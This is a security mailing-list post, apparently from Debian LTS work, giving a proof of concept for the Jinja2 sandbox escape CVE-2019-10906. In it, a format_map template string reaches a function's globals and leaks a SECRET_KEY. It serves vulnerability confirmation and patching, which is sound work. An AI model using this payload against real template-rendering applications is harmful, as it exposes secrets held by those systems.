[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

CVE-2019-10906 - jinja sandbox escape poc


I'm working on a potential jinja2 Debian LTS security update. Here is a
proof of concept which allows to easily reproduce the issue. This should
help confirming vulnerability in other suites.

>>> from jinja2.sandbox import SandboxedEnvironment
>>> env = SandboxedEnvironment()
>>> config = {'SECRET_KEY': '12345'}
>>> class User(object):
...     def __init__(self, name):
...             self.name = name
>>> t = env.from_string('{{
>>> "{x.__class__.__init__.__globals__[config]}".format_map(dic) }}')
>>> t.render(dic={"x": User('joe')})
"{'SECRET_KEY': '12345'}"

Expected behaviour would be jinja2.exceptions.SecurityError.

Adapted from[0].


[0] https://palletsprojects.com/blog/jinja-281-released/

                Hugo Lefeuvre (hle)    |    www.owl.eu.com
RSA4096_ 360B 03B3 BF27 4F4D 7A3F D5E8 14AA 1EB8 A247 3DFD
ed25519_ 37B2 6D38 0B25 B8A2 6B9F 3A65 A36F 5357 5F2D DC4C

Attachment: signature.asc
Description: PGP signature

Reply to: